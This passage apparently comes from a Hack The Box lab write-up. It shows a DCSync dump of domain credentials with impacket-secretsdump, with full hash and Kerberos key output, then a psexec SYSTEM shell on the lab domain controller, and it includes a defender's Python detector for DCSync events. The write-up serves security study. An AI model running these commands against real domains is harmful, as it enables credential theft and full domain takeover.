DCSync Attack


The credentials of the administrator user have been validated after abusing the ReadLAPSPassword privilege. Leveraging the DCSync privileges of the administrator user, I can dump the credentials of the entire domain.

┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ KRB5CCNAME=administrator@dc01.timelapse.htb.ccache impacket-secretsdump timelapse.htb/administrator@dc01.timelapse.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] target system bootkey: 0xd88b7b8c98a711544956c8ac71fbe251
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:6b16cb063fdaddb773ba256dd72a14b7:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
timelapse\dc01$:plain_password_hex:d3cfcd5b0ab0c632d5a308195440b45a23c8801499c629d03f782f19b50ced4a6dcb1db1993e44f4b10ee478c8719281d4495d48f5dcaea93e9971d8bdcd764711721d0c21e33a8fff4287cd6be04da5f1f330e441e90430b9cd364620c9d3aba10cbd774ee6137e5598135bea51e32ed131a15fbc8acf0adcc0c8f83ec97449f09f260fd4bcf7fad8f5d3da4733ae02828e4cb9a6068d93bbf4233962efe1610aba33dc04175482a0399625d449b5f4fff18eaf319620e8ccf5f3722edab41a590ddaa7310a69fed7cfa3f913ec59c872e5be2d1306c4e7844ac77760acc656160f06e908aece1f886acba4d9e80a09
timelapse\dc01$:aad3b435b51404eeaad3b435b51404ee:8920cc38eb2bd67e0c6897702cfe53e0:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xbc6b4be0de66f262c75df7ae4f7dadf34fa03ddc
dpapi_userkey:0x074fe8860a0fbca40b902c409998b1b9cd332cd1
[*] NL$KM 
 0000   AE 8C BD 2F 8A B9 48 87  5F F2 1E 2C 42 14 57 5E   .../..H._..,B.W^
 0010   90 E6 1C AC CD 23 42 26  CE D7 1F B5 D3 7F D6 44   .....#B&.......D
 0020   6B 29 7B 58 FF 89 BD A7  45 96 EF 5A 96 B1 E1 07   k){X....E..Z....
 0030   1f 71 9d 9d 0f e1 1d 1e  3a 95 dd 4f 13 a9 a6 92   .q......:..O....
nl$km:ae8cbd2f8ab948875ff21e2c4214575e90e61caccd234226ced71fb5d37fd6446b297b58ff89bda74596ef5a96b1e1071f719d9d0fe11d1e3a95dd4f13a9a692
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:fca19cc1e8c21e6b77d48eab75715d9b:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2960d580f05cd511b3da3d3663f3cb37:::
timelapse.htb\thecybergeek:1601:aad3b435b51404eeaad3b435b51404ee:c81875d2b3cd404f3c8eadc820248f06:::
timelapse.htb\payl0ad:1602:aad3b435b51404eeaad3b435b51404ee:f63b1edaad2ee253c3c228c6e08d1ea0:::
timelapse.htb\legacyy:1603:aad3b435b51404eeaad3b435b51404ee:93da975bcea111839cc584f2f528d63e:::
timelapse.htb\sinfulz:1604:aad3b435b51404eeaad3b435b51404ee:72b236d9b0d49860267f752f1dfc8103:::
timelapse.htb\babywyrm:1605:aad3b435b51404eeaad3b435b51404ee:d47c7e33d6911bb742fdf040af2e80da:::
timelapse.htb\svc_deploy:3103:aad3b435b51404eeaad3b435b51404ee:c912f3533b7114980dd7b6094be1a9d8:::
timelapse.htb\trx:5101:aad3b435b51404eeaad3b435b51404ee:4c7121d35cd421cbbd3e44ce83bc923e:::
dc01$:1000:aad3b435b51404eeaad3b435b51404ee:8920cc38eb2bd67e0c6897702cfe53e0:::
db01$:1606:aad3b435b51404eeaad3b435b51404ee:d9c629d35e3311abba1631dba29ead96:::
web01$:1607:aad3b435b51404eeaad3b435b51404ee:3b2910d8e6c79bbb20e8842ea4a9aeac:::
dev01$:1608:aad3b435b51404eeaad3b435b51404ee:463c7639ff204594dfbebbe71b3c6dbb:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:07e1a777446797f503e524603b52514bf713687edc1db6f83ef6151f895bb82f
administrator:aes128-cts-hmac-sha1-96:6bce210b2a8d00063e1665358a95f891
administrator:des-cbc-md5:07da75cb45380175
krbtgt:aes256-cts-hmac-sha1-96:ae4798139ee96d519e7c4678bb77986e2aaa227773b2dfa8d5908f19710a5d5f
krbtgt:aes128-cts-hmac-sha1-96:6a29eb8152bd9e373bb8512a18cbc029
krbtgt:des-cbc-md5:459876d080fd102c
timelapse.htb\thecybergeek:aes256-cts-hmac-sha1-96:1ce6ed23ae74f98e9fb4492b1d6da4abd53050cec84690dba0947da6f5072f7f
timelapse.htb\thecybergeek:aes128-cts-hmac-sha1-96:c9afa87f35f474a9111d52234ece52f6
timelapse.htb\thecybergeek:des-cbc-md5:c83e677c0e376238
timelapse.htb\payl0ad:aes256-cts-hmac-sha1-96:6588d1e91e012cfe69932d2f80f1d55d77b224822472021902735d70bab836dc
timelapse.htb\payl0ad:aes128-cts-hmac-sha1-96:527f8211d77499d99df13c572d4553c0
timelapse.htb\payl0ad:des-cbc-md5:25adceec4c613bb0
timelapse.htb\legacyy:aes256-cts-hmac-sha1-96:710b7e9c9374e4e306e6a9e599ae5f615f4e3e1acabb8a9183ef1d5358a46143
timelapse.htb\legacyy:aes128-cts-hmac-sha1-96:60adfce798b2431f2dee6993b119d591
timelapse.htb\legacyy:des-cbc-md5:160be04ae694e661
timelapse.htb\sinfulz:aes256-cts-hmac-sha1-96:9ce922adc954b7671fea5ff4f68ee1a00ccd18747856cefdfeb6b695dfa2c73b
timelapse.htb\sinfulz:aes128-cts-hmac-sha1-96:504fe2766f85d602ed947ee21f4e0c4e
timelapse.htb\sinfulz:des-cbc-md5:04cedc589234b97a
timelapse.htb\babywyrm:aes256-cts-hmac-sha1-96:98231e7161d5bcdb1db93ab0bf989434e6a6c6d86cfe10977a15eae461b29836
timelapse.htb\babywyrm:aes128-cts-hmac-sha1-96:e591049c737616153abafe43b68fa0e6
timelapse.htb\babywyrm:des-cbc-md5:316ebf795b52ea43
timelapse.htb\svc_deploy:aes256-cts-hmac-sha1-96:10cb46d648b9cc5774fd381c0b43e91c271ec59dada000b01c7ab3f4e614ddd1
timelapse.htb\svc_deploy:aes128-cts-hmac-sha1-96:33493640af7e815f2ecfbf59d9dedcee
timelapse.htb\svc_deploy:des-cbc-md5:c80edfb0ea262613
timelapse.htb\trx:aes256-cts-hmac-sha1-96:61d799ac74cd09e38786fcda8196705477b7871c15e0cd828849530783f2c93d
timelapse.htb\trx:aes128-cts-hmac-sha1-96:6948c570d61f5a3c9a941524a809eb3f
timelapse.htb\trx:des-cbc-md5:269468abe01329ad
dc01$:aes256-cts-hmac-sha1-96:c77912a1e16ba439c1488a553f7ea0ba63834ef5254c01c0524d21c1735e751c
dc01$:aes128-cts-hmac-sha1-96:4ed4772058d5faa3271dd6545ae199a3
dc01$:des-cbc-md5:04c43b8ffe0d1c04
db01$:aes256-cts-hmac-sha1-96:c03fda84ab460db1f0ae9ecc0cd17c9fab52576ac6a4c77df1f600d4b10e0088
db01$:aes128-cts-hmac-sha1-96:eb8af7494d9cc8e29e9b84923e929410
db01$:des-cbc-md5:5e9ddae537abe631
web01$:aes256-cts-hmac-sha1-96:f9655daa1066e543b94469ac5657d747fb17c9679bb4250efaa1eae177ff285a
web01$:aes128-cts-hmac-sha1-96:0a280a2ad97136959ac408c62450b0ed
web01$:des-cbc-md5:4fcef1e6b30b68f7
dev01$:aes256-cts-hmac-sha1-96:06278ffadea2d29dd059f4535284735d0dce00b81c74dfff24a1a679bff976b5
dev01$:aes128-cts-hmac-sha1-96:da52c69d83ea6c19c7c8a3b19a545a68
dev01$:des-cbc-md5:f229a754ec46c2e3
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] scmr sessionerror: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise
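A defender-side counterpart to the dump above, added here and not part of the original write-up: a small detector that flags DCSync-style replication requests in Windows Security event 4662 records by looking for the replication control-access-right GUIDs requested by a principal that is not a known domain controller. The log records are constructed, and the DC allow-list is an assumption.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records."""
import re

# Well-known control-access-right GUIDs from the AD schema that a DCSync request
# (IDL_DRSGetNCChanges) needs; the "-All" right is the one that returns secrets.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DS_REPL_GET_CHANGES_FILTERED}

# Machine accounts of domain controllers, which replicate legitimately.
# Assumption: the defender maintains this list; here it mirrors the lab above.
KNOWN_DC_ACCOUNTS = {"DC01$"}

# Constructed 4662/4624 records flattened to key=value pairs (not real event logs).
SAMPLE_LOG = """\
EventID=4662 SubjectDomainName=TIMELAPSE SubjectUserName=DC01$ Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100
EventID=4662 SubjectDomainName=TIMELAPSE SubjectUserName=administrator Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100
EventID=4662 SubjectDomainName=TIMELAPSE SubjectUserName=svc_deploy Properties=%%7688 {bf967a7f-0de6-11d0-a285-00aa003049e2} AccessMask=0x10
EventID=4624 SubjectDomainName=TIMELAPSE SubjectUserName=legacyy LogonType=3
"""

KV_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

def parse_event(line):
    """Turn one flattened record into a dict; values may contain spaces."""
    return dict(KV_RE.findall(line))

def replication_rights(event):
    """Replication control-access rights present in the event's Properties field."""
    found = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return found & REPLICATION_RIGHTS

def is_dcsync(event):
    """True for a 4662 that requests replication rights from a non-DC principal."""
    if event.get("EventID") != "4662" or not replication_rights(event):
        return False
    return event.get("SubjectUserName", "").upper() not in KNOWN_DC_ACCOUNTS

def find_dcsync_alerts(log_text):
    """Return (DOMAIN\\user, sorted rights) for every suspicious record."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if is_dcsync(event):
            who = f"{event['SubjectDomainName']}\\{event['SubjectUserName']}"
            alerts.append((who, sorted(replication_rights(event))))
    return alerts
```

Event 4662 is only written when "Audit Directory Service Access" is enabled and the domain object's SACL audits these control-access rights, so the rule is silent on a DC without that auditing.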

Shell Drop


┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ KRB5CCNAME=administrator@dc01.timelapse.htb.ccache impacket-psexec timelapse.htb/administrator@dc01.timelapse.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on dc01.timelapse.htb.....
[*] Found writable share ADMIN$
[*] Uploading file jxVfkOwS.exe
[*] Opening SVCManager on dc01.timelapse.htb.....
[*] Creating service MpAh on dc01.timelapse.htb.....
[*] Starting service MpAh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2686]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
dc01
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::245
   IPv6 Address. . . . . . . . . . . : dead:beef::cc93:dbe2:8401:964
   Link-local IPv6 Address . . . . . : fe80::cc93:dbe2:8401:964%13
   IPv4 Address. . . . . . . . . . . : 10.10.11.152
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%13
                                       10.10.10.2

System Level Compromise